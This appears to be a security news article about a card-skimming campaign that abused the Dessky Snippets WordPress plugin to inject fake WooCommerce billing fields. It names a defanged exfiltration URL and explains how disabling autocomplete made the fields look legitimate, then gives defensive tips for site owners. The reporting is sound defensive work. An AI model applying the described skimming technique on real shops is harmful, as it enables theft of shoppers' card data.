Dessky Snippets WordPress Plugin Targeted by Hackers to Steal Credit Card Info

Researchers at Sucuri have recently discovered a malicious campaign where hackers exploit a lesser-known WordPress plugin in order to steal credit card information from unsuspecting e-commerce websites. 

The plugin, known as Dessky Snippets, is designed to allow webmasters to add custom PHP code to their sites. Attackers have been using it to implement malware that skims credit card data on affected sites.

Malicious Code Injection on E-Commerce Platforms

“This malicious code was saved in the dnsp_settings option in the WordPress wp_options table and was designed to modify the checkout process in WooCommerce by manipulating the billing form and injecting its own code,” according to Ben Martin. 

The malware cleverly adds extra fields to the WooCommerce billing form. These fields request sensitive details from shoppers, including their names, addresses, credit card numbers, expiration dates, and CVV numbers. Once entered, this data is secretly sent to a malicious server via the URL “hxxps://2of[.]cc/wp-content/.”

One of the more cunning features of this attack is the disabling of the autocomplete function in the fraudulent billing form fields. This tactic makes the malicious fields appear normal and necessary, thus less likely to raise alarms among users.

“By manually disabling this feature on the fake checkout form it reduces the likelihood that the browser will warn the user that sensitive information is being entered, and ensures that the fields stay blank until manually filled out by the user, reducing suspicion and making the fields appear as regular, necessary inputs for the transaction,” Martin further stated.

Repeated Misuse of WordPress Plugins 

This incident is not an isolated case. Only last month, Sucuri uncovered another misuse of a legitimate plugin, WPCode, where hackers injected malicious JavaScript to redirect visitors to harmful domains. 

In addition, a similar strategy was also employed in the Sign1 malware campaign, which affected more than 39,000 WordPress sites in six months through the Simple Custom CSS and JS plugin.

Preventative Measures for Website Owners

To maintain the security of e-commerce platforms and safeguard sensitive customer information, website owners are recommended to:

• Ensure all website components and plugins are regularly updated to the latest versions, as updates often include security patches that protect against known vulnerabilities.

• Create strong, complex passwords that combine upper and lower case letters, numbers, and special characters to enhance security against brute-force attacks.

• Schedule and conduct comprehensive security audits of your website frequently. Look for any signs of malware, unauthorized modifications, or other security breaches.

• Implement advanced monitoring tools to keep track of all website activities. This can help in detecting and responding to unusual behavior or potential security threats swiftly.